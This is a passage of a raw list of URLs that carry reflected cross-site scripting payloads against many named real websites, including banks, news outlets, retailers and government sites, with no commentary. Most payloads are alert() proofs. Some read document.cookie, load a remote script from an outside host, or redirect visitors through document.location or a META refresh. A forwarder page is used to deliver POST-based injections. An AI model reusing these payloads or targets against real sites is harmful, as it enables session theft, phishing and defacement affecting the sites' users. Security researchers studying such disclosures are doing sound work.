&method=and&format=builtin-long&sort=score http://www.the-dma.org/cgi2/htsearch?config=the-dmahtdigwhole&restrict=&words='

http://www.alexa.com/site/site_stats/signup?site_url=http%3A%2F%2Fasdf.com%2F%3F%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&range=3m&widget=g&submitted=true&mode=graph&amzn_id= http://www.altavista.com/web/res_text?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://boards.live.com/themes/us/en/ccode.aspx?ForumId=0--> http://movies.msn.com/movies/genre.aspx?genre=Comedy&');alert('www.securitylab.ru http://boards.live.com/Travelboards/board.aspx?BoardID=144&y000=%20--> http://www.adobe.com/cfusion/search/index.cfm?loc=en_us&term=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E http://music.yahoo.com/ymu/country/?refurl=javascript:alert('xss');//&data=ymu&.src= https://www.screenselect.co.uk/visitor/sign_up_1.html?promotion_code=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://www.screenselect.co.uk/visitor/browse.html?node_id=6539%22asd%3E%3Cscript%3Ealert('xss')%3C/script%3E http://www1.euro.dell.com/content/products/category.aspx/desktops?c=uk&cs=ukdhs1&l=en&s=qwerty');alert('xss');// http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22;alert('xss');// http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22%0aalert('xss')// http://www.serverspy.net/site/stats/mods.html?g=0%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1 http://www.goblinworkshop.com/search2.html?s=%5C%22%3CSCRIPT%3Ealert%28%5C%22kefka%20was%20here%5C%22%29%3C%2FSCRIPT%3E%5C%22 http://www.go2.com/webbrowser/indexSearch.cfm?isSuggestion=1&tokenString=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go2search=Category&accountAction=createTemp&StreetAddress=&city=&State=&zipcode=&radius=10&x=0&y=0 http://comsearch.comcast.commerce.atomz.com/?q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&x=0&y=0 http://home.bellsouth.net/s/s.dll?spage=search%2Fresultshome1.htm&_pgoffset=0&startdate=01%2F01%2F2010&man=1&num=10&type=cat&SearchType=web&string=%22%3CSCRIPT%3Ealert%28%22kefka+was+here%22%29%3C%2FSCRIPT%3E%22&imageField.x=0&imageField.y=0&imageField=search http://www.traveltree.co.uk/pages/affiliatefr.asp?URL=javascript:alert('XSS') http://www.sparkfun.com/commerce/advanced_search_result.php?keywords=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&x=0&y=0 http://www.uo.com/cgi-bin/search.pl?words='%3E%3Cscript%3Ealert(1337)%3C/script%3E%3Cb%20 http://blogshares.com/blogs.php?blog=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.rawstory.com/showarticle.php?src=%22%20onLoad=alert(document.cookie)%20x=%22 http://www.hawkee.com/snippets.php?snippet_type=php&tag=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.seq.org/outside.php?SITEURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.mindswap.org/rdf/instance/?inst=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.free-php.org/index.php?cat_select=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.shadows.com/shadow/?page=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.php.com/include/search/index.php?where_keywords=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://actifpub.com/jump.php?sid=489&url=javascript%3Aalert%28document.cookie%29%3B http://mojo.zug.com/mojo.cgi?flavor=subscribe&list=zugmail&email=%22%20onmouseover=alert('xss') http://www.marketwatch.com/tools/marketsummary/default.asp?siteid=mktw%22%0aalert(%22asd%22)// http://www.marketwatch.com/tools/quotes/quotes.asp?symb=qwerty&vc=&siteid=mktw%22%0aalert(%22asd%22)//&dist=dropmenu http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20username%20field http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://userfriendly.org/cgi-bin/survey.cgi&personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E http://h20000.www2.hp.com/bizsupport/TechSupport/ProdSearch.jsp?lang=en&cc=us&taskId=135&prod=%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E http://www.animenfo.com/search.php?query=%22%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+%22&queryin=anime_titles&action=Go&option=keywords http://www.manga-news.com/recherche.php3?recherche=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://www.tokyopop.com/search.php?query=%22%3Cscript%3Ealert('XSS')%3C/script%3E%22 http://anidb.info/perl-bin/animedb.pl?show=animelist&adb.search=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&do.search=search http://animefringe.com/search/index.php?REQ=%3Cscript%3Ealert('XSS')%3C/script%3E http://www.darkhorse.com/search/search.php?frompage=userINPUT&sstring=maluc+%3CBODY+onload%3Dalert%28%22XSS%22%29%3E&match=any&scope=all&type=all&startmonth=all&startyear=all&endmonth=all&endyear=all&genre=all http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.yesasia.com/en/Search/SearchResult.aspx&asKeyword=%3Cscript%3Ealert('XSS')%3C/script%3E&asSectionID=allproducts&asIncludeOutOfStock=1&asShowAdult=0&mode=simplesearch http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.advfilms.com/search.asp&search= http://www.totalvid.com/searchResultsBlinkx.cfm?blnFailed=1&strSearch=%3C/title%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://www.hotscripts.com/search/index.html?command=do_search_mm&query=%22>&method=and&format=builtin-long&sort=score http://www.the-dma.org/cgi2/htsearch?config=the-dmahtdigwhole&restrict=&words='&method=and http://www.sciencemag.org/cgi/search?src=hw&site_area=sci&fulltext= http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.exa.com.au/exasearch/index.php&s=foobar http://search.dangdang.com/dangdang.dll?key=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E&search_btn_top=%D4%DA%CB%F9%D3%D0%C9%CC%C6%B7%D6%D0%CB%D1&key1=&key2=&key3=&key4=&key5=&mode=&catalog=&sel1=1&sel2=1&sel3=1 http://www.darkreading.com/document.asp?doc_id=104313&f_src=darkreading_section_296 http://www.darkreading.com/reprintform.asp?doc_id=104313&doc_headline=Hackers+Reveal+Vulnerable+Websites+%22%3Cscript%3Ealert%20('XSS')%3C/script%3E http://nbc.resultspage.com/search?ts=custom&p=Q&uid=&w=%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.darkreading.com/boards/message.asp?msg_id=138506 http://www.darkreading.com/boards/search.asp?search=&topic_id=30&thread_id=121715&filter=message_subject http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hacker.com/enter.asp&hacker=www.hacker.com&name=&address=&city=&state=&postalcode=&country=&phone=&email=&offer=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&comments=&Submit=Submit http://www.weather.com/search/enhanced?where= http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&q=%22;alert('quack')// http://www.independent.co.uk/search/simple.do?searchString=%3Cscript%3Ealert%28%27quack%27%29%3C%2Fscript%3E http://www.macworld.com/info/contact/form.php?e=///Not%20a%20Sploit%5C%22%20%3Cscript%3Ea=/XSS/;alert(a)%3C/script%3E http://docs.info.apple.com/article.html?artnum=1233';alert('Shiver%20me%20Timbers.');document.location='http://%6D%61%63-%73%75%63%6B%73.com';a=%27 http://www.zdnet.co.uk/search/?query=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&collection=all&x=36&y=9 http://www.scmagazine.com/us/awards/voting/index.cfm?fuseaction=XCU.Awards.Voting.Vote&nSubCatID=26140&uCategoryUuid=401b5be2-9cee-4298-9da4-0eaa4bf82348&uNomineeUuid=58f3627d-70e4-4bd7-bc30-ab660cdb17dd&sRandomString=66EDC001&checkCriteria_sName=You%20Are%20Voting%20On..%22%3E%3Cscript%3Ealert%28%22overblown%3F%21%22%29%3C%2Fscript%3E%3Cr%22&checkCriteria_sEmail=Best%20Web%20Filtering%20Solution&checkCriteria_bIsITProfessional=0&checkCriteria_bIsSubscriber=0&checkCriteria_bIsUSResident=0&checkCriteria_sCode=Ironic?&submit=submit https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://search.bbb.org/?searchtype=url&url=%27%3E%3Cscript%2Fmaluc%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E%3Cb+%27&search=Search http://sfbay.craigslist.org/search/sss?query=%3Cscript>alert('quack') http://preference.the-dma.org/cgi/optoutemps2.php?email1=You+have+an+XSS+hole%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E&email2=&email3= http://www.comcast.net/signin.jsp?redirectUrl=%22>alert(String.fromCharCode(88,83,83))&Submit2=++Sign+In++ http://www.teliadk.idlesurf.net/cgi-bin/search.pl?lang_intrf=da&query=asdf%27%3Balert%28%27XSS%27%29%3Bt+%3D%27&x=0&y=0&qtype=and http://se.ext.telia.newjobs.com/login.asp?redirect=h%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20 http://192.89.232.139/jobs/frmAdSearch.asp?JOBCITY=&JOBUNIT=&JOBTYPE=&JOBFUN=&JOBFUN_SUB=&JOBFUNCTION=&FREE_TEXT=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&JOBSORT=AD_EXT_CDATE&TOP_10=0&L=1 http://webbguide.telia.se/redirect.jsp?rid=-1&type=FRONTWEB_INFO_FTG&url=http://nabegr32b.cocolog-nifty.com/wonderfulgr32/images/caterham_seven_csr260.jpg http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://home.singtel.com/customer_service/cust_serv_emailus.asp&salutation_=&name_=XSS1%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cb%20&nature_of_feedback_=&contact_number_=XSS2%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cb%20&email_=XSS3%22%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cb%20&commenting_on_=&your_comments_=XSS4 http://www.cbs.com/excedrin/register.php?mpid=2691&success_page=thankyou.php&action=create&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&password2=&firstname=&lastname=&address1=&city=&state=&zip=&country=&birthdate=%2F%2F&birthmonth=&birthday=&birthyear=&phone=&email=&previous_email=&ireadtherules=&Submit=Submit http://rzr.online.fr/docs/search/redir.php?url=a http://www.nationalcrediteducationweek.com/redirect.aspx?redir=delayedXSS';alert('XSS');t%20= http://www.nscp.org/cgi-bin/leave.pl?redir=google.com/ http://www.dmas.virginia.gov/pr-provider_no.asp?redir=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb http://www.innovations.va.gov/innovations/docs/notva.cfm?redir=');%7Dalert('XSS');if(1==0)%7B// http://robotics.nasa.gov/rcc/redirect.php?url=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3C/b http://www.opic.gov/leaving.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_alp.php?p_sid=5tkbkvii&p_lva=&p_li=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&p_search_text=a%22%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E&p_new_search=1 http://www.dotcr.ost.dot.gov/asp/redirect.asp?url=zomg%20XSS%3Cscript%3Ealert('XSS')%3C/script%3E http://www.mbda.gov/redirect.php?url='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b http://www.friendsreunited.co.uk/FriendsReunited.asp?wci=forgotton&member_email=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E&error=Y http://www.salford.gov.uk/search.htm?col=justhtml&qt=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E http://www.freeml.com/servlet/redir?rd=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com http://www.siteadvisor.com/lookup/?q='%20onmouseover=%22alert('want%20to%20add%20whatever%20you%20like')%22%3E http://audience.cnn.com/services/cnn/memberservices/member_auth.jsp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.bbc.co.uk/cgi-perl/signon/mainscript.pl?c=login&service=mbhealth&ptrt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E https://www.alipay.com/user/user_register.htm?support=000000&_fmu.u._0.e=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&_fmu.u._0.e=&_fmu.u._0.q=&_fmu.u._0.qu=&_fmu.u._0.pa=&_fmu.u._0.pay=&_fmu.u._0.p=%CE%D2%B0%D6%B0%D6%C2%E8%C2%E8%B5%C4%C3%FB%D7%D6%B8%F7%CA%C7%CA%B2%C3%B4&_fmu.u._0.o=&_fmu.u._0.pr=&_fmu.u._0.u=2&_fmu.u._0.f=&_fmu.u._0.r=&_fmu.u._0.ca=%C9%ED%B7%DD%D6%A4&_fmu.u._0.car=&_fmu.u._0.c=&_fmu.u._0.re=alipay&action=register_action&event_submit_do_register=anything&Submit=%CD%AC%D2%E2%D2%D4%CF%C2%CC%F5%BF%EE%A3%AC%B2%A2%C8%B7%C8%CF%D7%A2%B2%E1 http://www.clickbank.com/marketplace.html?method=Sort&s=&c=-1&subc=-1&keywords=%22%3E%3Cscript%3Ealert+%28%27xss%27%29%3C%2Fscript%3E&sortBy=popularity&i=10 http://www.altavista.com/web/results?&q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%22Ownage+by+Acidus%22%29%3C%2Fscript%3E http://search.netscape.com/ns/search?query=%27%29%3Balert%28%27xss&st=webresults&fromPage=NSCPResultsT http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?url=%22%3E%3Cscript%3Ealert(%220wnage%20by%20Acidus%22)%3C/script%3E http://www.pepperjam.com/search_products.php?query=%3Cscript+type%3D%22text%2Fjavascript%22%3E+alert%28%27XSS+tsar%27%29+%3C%2Fscript%3E https://www.wamuhomeloans.com/cgi-bin/mqinterconnect.cgi?link=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.hbo.com/scripts/video/vidplayer_set.html?movie=/av/events/psa/ncta_psa+section=events+num=1115404066482+title=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20PSA:%20%22From%20A%20Distance%22:%20Visit%20www.controlyourtv.org+tunein= http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&sort=date%3AD%3AR%3Ad1&q=%22%3Balert%28%22XSS%22%29%3B%2F%2F http://www.hemnet.se/bevakning/BevLogin.asp?service=hemnet&type=bev&action=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&username=&email=&reklam=N&htmlmail=N&error=-2& http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.verisign.com/cgi-bin/ssl/email-friend/email.cgi&chromeTitle=End%20of%20the%20Internet&check=yes&url=http://www.shibumi.org/eoti.htm&to_email=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3C%2F%73%63%72%69%70%74%3E http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=%22;alert(%22XSS%22);%22&site_id=3600005&_requestid=190824 http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=--%3E%3Cscript%3Eeval('if(document.getElementById(%22COPYRIGHTContainer%22).innerHTML!%3D%22%22)%7Bdocument.getElementById(%22COPYRIGHTContainer%22).innerHTML%3D%22%22;alert(%22XSS%22);%7D');%3C/script%3E%3Cb%22&site_id=3600005&_requestid=192557 http://subscribe.infoworld.com/cgi-win/ifwd.cgi?e=%22%3E%3Cscript%20src=http://digi.whiteacid.org/xss.js%3E%3C/script%3E&x=0&y=0&m=newsletter http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://news.com.com/2113-1038_3-6119515.html&toEmailAddress=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://www.techworld.com/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Cb+%22&Search=SEARCH&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&search_news=1&search_reviews=1&search_blogs=1&search_whitepapers=1&search_insight=1&search_casestudies=1&search_howto=1&search_briefings=1&search_interviews=1 http://www.techworld.com/search/index.cfm?fuseaction=dosearch&channel_search=channel&search_reviews=1&search_news=1&search_insight=1&search_howto=1&search_whitepapers=1&search_casestudies=1&search_briefings=1&search_interviews=1&search_blogs=1&search_networking=1&search_storage=1&search_security=1&search_mobility=1&search_applications=1&search_opsys=1&search_midsizedbusiness=1&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Go=Go http://www.techworld.com/account/login/index.cfm?fuseaction=login¤tloc=%2Fabout%2Fcommercial.cfm¤tlocparms=&userid=XSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&password=apple&login=login http://www.pcadvisor.co.uk/search/index.cfm?thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=GO&action=dosearch&search_news=1&search_reviews=1&search_features=1&search_blogs=1&search_downloads=1&searchorigin=header http://news.com.com/2114-1038-6119515.html?toEmailAddress=%22%3EXSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cbr+%22&fromEmailAddress=%22%3EXSS+here+too%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cbr+%22&comments=and+here%3F%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&CAPTCHA_RESPONSE=&CAPTCHA_GUID=8a8f128e0dcbac55010deb0f55616c91 http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 http://www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%29%3Balert%28%22XSS%22%29%3Beval%28%22&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1 https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22 http://search.disney.go.com/exec/?dym=1;i=1;land=1;m=1;oq=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E;x=19;y=8;r=1 http://playboy.rgc2.com/servlet/campaignrespondent?email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&emailButton=Yes%21&_ID_=pla.2264&Campaign_=NewProfileEntryPointCmpgn_SiteWideCollection&SIGNUP_ORIGIN=Passive_header_sitenav&SIGNUP_URL= http://www.portblogs.com/blogpublisher/app/ext/sendthis.aspx?p= http://www.startrek.com/startrek/view/search/result.html?type=article&search=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&category= http://weather.aol.com/search.adp?search=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E https://shop.starwars.com/myaccount/forgotten_password.html?retrieve=1&goback=&email=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&LoginBtn.x=77&LoginBtn.y=11&LoginBtn=Submit http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.gm.com/Scripts/SearchServer.exe&query=%22%3E%3Cscript%3Ealert('!');%3C/script%3E&method=mainQuery&Submit=Submit http://validator.opml.org/?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%22 http://www.w3.org/2001/10/glance/view/?feed=%22%3E%3C/a%3E%3C/h3%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22Tried%20to%20keep%20it%20W3C%20compliant.%22);%3C/script%3E%3Ch3%3E%3Ca%20href=%22http://www.w3.org http://www.w3.org/2001/10/glance/view/?since=%22+%2F%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Cbr+a%3D%22 http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query=&index-grp=Public__FULL&index-type=t&type-index=XSS+Here%22%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Cbr+a%3D%22 http://order.sbs.yahoo.com/ds/DomainSearchResults?.p=YD1&m=dom&.src=sbs&.promo=BESTDEAL&d=%22%3E%3C/a%3E%3Cscript%3Ealert('xss')%3C/script%3E http://viewer.youtubech.com/?q=%22>alert(%22XSS%22) http://movies.aol.com/search/dvdresults.adp?query=asdf%22;alert(%22XSS%22);t=%22 http://movies.aol.com/search/movieanddvdresults.adp?query=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cb%20x%3D%22 http://movies.aol.com/search/dvdresults.adp?query=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://aol.careerbuilder.com/PLI/QuickSrchV2.asp?CatalystID=JS_AOL_MainQSBox&SiteID=cbaol003&lr=cbaol&QSCTY=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&QSSTS=ALL,US&QSKWD=&QSJBT=All&QSJBT=All&QSJBT=All http://videogames.aol.com/results.adp?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://www.darkreading.com/document.asp?doc_id=104739&WT.svl=news2_1 http://www.lightreading.com/search.asp?simple_search=yes&search_value=XSS+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search_timespan=past_year http://support.acunetix.com/index.php?form_submit=forgot_code&mod_id=6&forgot_email=XSS+is+here.%22%3E%3Cscript%3Ea%3DString.fromCharCode%2883%29%3Balert%28String.fromCharCode%2888%29%2Ba%2Ba%29%3C%2Fscript%3E%3Cx+x%3D&forgot_code=XSS+here+too.%22%3E%3Cscript%3Ea%3DString.fromCharCode%2883%29%3Balert%28String.fromCharCode%2888%29%2Ba%2Ba%2B2%29%3C%2Fscript%3E%3Cx+x%3D&forgot_password=asdf&verify_password=asdf http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,48))%3C/script%3E&areacode=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,49))%3C/script%3E&phone=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,50))%3C/script%3E&phoneExt=®ion=&howtocontact=phone&action=Submit https://www.paypal.com/cgi-bin/webscr?cmd=asdf');alert('XSS');eval('p-outside https://www.paypal.com/cgi-bin/webscr?cmd=asdf%22;alert(%22XSS%22);x%20=%22-outside http://query.nytimes.com/search/query?frow=0&n=10&srcht=s&query=asdf%27%3Balert%28%27XSS%27%29%3Bx+%3D%27&srchst=nyt&submit.x=0&submit.y=0&submit=sub&hdlquery=&bylquery=&daterange=full&mon1=01&day1=01&year1=1981&mon2=09&day2=27&year2=2006 http://www.truste.org/ivalidate.php?url=%77%27%20%73%74%79%6C%65%3D%27%78%78%3A%65%78%70%72%65%73%73%69%6F%6E%28%61%6C%65%72%74%28%29%29 http://www.virgin.com/search/?kwd=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&x=27&y=5 http://search.sky.com/search/skynews/results?QUERY=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&CID=30000&Submit.x=0&Submit.y=0 http://search.forbes.com/search/find?MT=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&sort=&aname=&author=&date=&pub=forbes.com%2Cmagazine%2Cglobal%2Cfyi%2Casap%2Cbest%2Cbow%2Cap%2Cpinnacor%2Cafx http://www.pcworld.com/search/results?qt=%22%20onmouseover=%22alert('xss');%22 http://www.aapt.com/.cfm?nft=1&t=5&p=1 http://cgi.yahoo.com/bin/userbug?name=Null&email=null@yahoo.com&phone=1000-000-0000&category=Nowhere&comments= https://www.netflix.com/LoginHelp?lname=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+x%3D%22&cardNumber=&routingNumber=&accountNumber=&SubmitButton=Send&forgot=LOGIN http://www.blockbuster.com/search/PerformKeyWordSearchAction.action?searchType=Movies&schannel=Movies&subChan=&keyword=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+x%3D%22&x=0&y=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www-5.jeep.com:80/searchapp/ui.jsp&ui_mode=question&charset=UTF-8&language=en-US&brandSite=jeep&prior_transaction_id=10602&question_box=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22 https://support.opera.com/bin/customer?action=sendPassword&email=GetFireFox%22%3E%3Cscript%3Ealert%28%22Get+FireFox%22%29%3Bdocument.write+%28%27%3CMETA+HTTP-EQUIV%3D%22refresh%22+content%3D%220%3BURL%3Dhttp%3A%2F%2Fwww.getfirefox.net%2F%22%3E%27%29%3B%3C%2Fscript%3E%3Cx+x%3D%22&ok=OK http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp&query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=33&y=9 http://www.gm.com/Scripts/SearchServer.exe?query=%22%3E%3Cscript%3Ealert('!');%3C/script%3E&method=mainQuery&Submit=Submit http://www.verisign.com/cgi-bin/ssl/email-friend/email.cgi?chromeTitle=End%20of%20the%20Internet&check=yes&url=http://www.shibumi.org/eoti.htm&to_email=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3C%2F%73%63%72%69%70%74%3E http://news.com.com/2113-1038_3-6119515.html?toEmailAddress=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E https://business.verizonwireless.com/b2b/jsp/popups/optin.jsp?email=xss'%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cb%20 http://www.travelodge.com/Travelodge/control/find_by_map_name2?LOCATION_LEVEL=country&LOCATION_CODE=null http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20username%20field http://userfriendly.org/cgi-bin/survey.cgi?personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E http://webcenters.netscape.compuserve.com/celebrity/results.jsp?floc=ce-main-2-l1&q=a--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&searchType=photosearch&x=0&y=0 http://search.lexmark.com/searchresults.shtml?query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=44&y=16 http://www.nvidia.com/page/search.html?page=1&keywords=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&booleanMode=1 http://search.ati.com/nasearch.asp?Query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&go.x=14&go.y=15&DefaultLanguage=16&Catalog=NASite&rdoCatalog=NASite&Start=&Total=&Stat=New http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&qxt=home&display=&dclksa=1 http://www.hooters.com/news_and_events/calendar/index.asp?req_event=&req_state=asdf%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&submit=Search&c_date=&req_yr= 